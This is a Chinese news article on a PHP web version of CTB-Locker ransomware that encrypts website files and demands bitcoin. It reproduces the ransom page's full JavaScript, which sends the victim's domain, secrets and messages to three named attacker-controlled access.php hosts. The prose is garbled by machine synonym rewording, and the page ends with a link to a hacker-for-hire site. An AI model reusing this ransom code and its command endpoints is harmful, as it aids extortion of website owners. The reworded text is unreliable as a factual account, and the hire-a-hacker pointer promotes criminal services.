Web版勒索软件CTB-Locker PHP源码现身GitHub
勒索软件CTB-Locker呈现其Web演化版别,可感染网页站点。据剖析,其编码为选用PHP编写,现在源码已被保管至GitHub上。
Web版勒索软件CTB-Locker的初次呈现
就在本年西方情人节前夕,英国的一位站长却有一个不愉快的发现,他查看到其办理的网站页面遭受篡改,篡改页面上呈现的信息看起来跟电脑感染歹意勒索软件的景象类似,其主要信息是让站点办理员付出比特币,交换相应目录文件的解密,以便使站点康复正常。篡改页面如下图,
在被验证为初次针对网页的勒索工作后,该工作便得到极大的重视。但其实作为服务器办理员来说,初步都只是期望这仅仅是一次性工作,而不是进犯者预谋的初步。
在初始阶段,实际上并无发现其他感染工作,而状况在曩昔的一个星期中有了极大的改变。在这段时间内频频呈现上述的网页勒索感染工作。据悉,到现在有超越100个同类型工作被发现。在篡改的信息中其暗地操纵者要求受害者付出0.4个比特币,而且如在两天内未完成付出,付出额度将提高至0.8个比特币。以下为其要求付出比特币的源码:
script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
if (data["status"] == "success") {
onsuccess(data);
} else {
alert(data["status"]);
}
}, 'json'
).fail(function() {
alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
iadmin = (iadmin + 1) % 3;
});
}
$('#decrypt').click(function() {
post_admin("decrypt=", function(data) {
alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
});
});
$('#dectest').click(function() {
post_admin("dectest=&secret="+($("#secret").val()), function(data) {
alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
});
});
$('#sendmsg').click(function() {
msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
alert('Thank you for feedback!');
});
});
$('#recvmsg').click(function() {
post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
$("#chatmsg").val(data["answer"]);
});
});
script>
该勒索程序在勒索付出告诉上,跟CTB-Locker为同一模型。但单单从技术上来看,这跟“声名远扬”的CTB-Locker勒索软件的状况不符。因其仅运转于Windows桌面环境,而并无法运转在 Linux Web服务器上。
Web版CTB-Locker选用PHP编写
来自 Stormshield的安全剖析员Benkow,设法剖析勒索软件的运转形式并从一个受感染的目标提取到了源代码。随后,Benkow将Web版CTB-Locker 源码上传至 KernelMode论坛上,供其他安全研讨人员剖析和研讨。而Web版CTB-Locker的“知名度”便敏捷提高,其源码也被保管至GitHub。
源代码地址请点击:GitHub
考虑到,此前勒索软件Hidden Tear源码也保管至GitHub,但工作终究却没有朝着有利于用户的方向发展。而结合当时的景象,能够预见,在接下来的数个月中,将或许呈现大规模的针对网页站点进行的进犯感染。
[1] [2] 黑客接单网